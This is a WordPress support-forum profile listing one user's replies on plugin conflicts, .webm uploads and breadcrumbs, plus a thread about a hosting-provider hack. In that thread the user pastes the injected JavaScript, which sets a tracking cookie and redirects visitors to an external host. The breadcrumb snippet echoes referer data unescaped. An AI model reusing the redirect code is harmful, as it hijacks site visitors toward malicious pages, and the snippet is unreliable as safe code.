rgbk
Forum Replies Created
-
Forum: Plugins
In reply to: Smarter Navigation — dream came true, if it worked.It seems that this plugin clashes with postMash ??
Forum: Requests and Feedback
In reply to: Get rid of that admin bar!It’s pretty simple: It broke my layout!
That is NOT good.
The fact that you have to install a plugin to make a ‘feature’ that ruins your layout go away is mental and bad practice. Bad move WordPress.Forum: Fixing WordPress
In reply to: Uploading .webm format results in security guidline breach and failHi there Mr Mist
Thanks for letting me know.
I am an admin! Thats the weird thing.
I’ll take a look at this plugin.
Best
MarcForum: Fixing WordPress
In reply to: Uploading .webm format results in security guidline breach and failBump, seriously, no one has ever needed to use webm on wordpress?
Forum: Fixing WordPress
In reply to: Uploading .webm format results in security guidline breach and failMore info:
What’s really peculiar is that another video format called ogv (Theora) was not being recognised in the html5 player, BUT it wasn’t breaching security according to wordpress.
So I added the mimetype to the apache (not via htaccess) and voila, it worked.I think this is a bug within wordpress, surely?
Seriously where is this s3temp folder and why and what do i have to do with my cron jobs?
It’s so weird man, make a genius plugin like this and then be super mysterious about what you have to do to make it work?!
It take a few sentences added to the setting file of the plugin to help the users out!Forum: Fixing WordPress
In reply to: Media Temple oeaou hackAre you guys getting a response from MT?
I find it shocking that i sent them a support query yesterday and 24 hours still nothing?
They aren’t cheap either. I mean why arent they jumping on this issue? I sent them this forum discussion and everything.Btw i didn’t update to 3.01.
Forum: Fixing WordPress
In reply to: Media Temple oeaou hackIf you google that pma_visited_theme2 you get this:
https://www.google.com/search?sourceid=chrome&ie=UTF-8&q=pma_visited_theme2
Forum: Fixing WordPress
In reply to: Media Temple oeaou hackthat url https://ue.oeaou.com/31 takes me to this script:
function toloveyes(alwayslovers,value,tobelove){ var exdate=new Date(); exdate.setDate(exdate.getDate()+tobelove); document.cookie=alwayslovers+ "=" +escape(value)+ ((tobelove==null) ? "" : ";expires="+exdate.toGMTString()); } function getCookie(alwayslovers){ if (document.cookie.length>0) { cstatr=document.cookie.indexOf(alwayslovers + "="); if (cstatr!=-1) { cstatr=cstatr + alwayslovers.length+1; olalala=document.cookie.indexOf(";",cstatr); if (olalala==-1) olalala=document.cookie.length; return unescape(document.cookie.substring(cstatr,olalala)); } } return ""; } var name=getCookie("pma_visited_theme2"); if (name==""){ toloveyes("pma_visited_theme2","1",20); var url="https://e.auoo.info/in2.php?n=508102"; window.top.location.replace(url); }else{ }
Forum: Fixing WordPress
In reply to: Media Temple oeaou hackAny of you using vimeo on your site?
I’m using vimeo as flash and as jquery built video (needed to control volume on some of the autoplaying videos)I dont use askimet, deleted it, and dont share the same plugins listed in this forum.
Forum: Fixing WordPress
In reply to: Media Temple oeaou hackthis is NUTS
how can either WP or MT be having this?
Can someone help me understand why it would be MT and not WP, or visa versa?I pay a lot to MT and it seems they have had these hacking issues more then once.
I’m on MT too, their grid service.I removed
<?php query_posts( array( 'post_type' => array('post') ) );
in index.php, somehow it was making the Proper Pagination plugin bug out.
Solved
Forum: Fixing WordPress
In reply to: Show the name of the page before (Breadcrumb Hell!)Here’s the solution:
‘<?php
$url = wp_get_referer();
$path_parts = pathinfo($url);
echo ‘Back to ‘. $path_parts[‘filename’], “\n”;
?>’Forum: Plugins
In reply to: Prioritize category for posts with multiple categories in breadcrumbsSOLUTION!!
Use this in the relavent post:
<?php $url = wp_get_referer(); $path_parts = pathinfo($url); echo 'Back to '. $path_parts['filename'], "\n"; ?>
Guys
This is the solution:<?php $url = wp_get_referer(); $path_parts = pathinfo($url); echo 'Back to '. $path_parts['filename'], "\n"; ?>
Pretty elegant solution!
Thanks a bunch alchymyth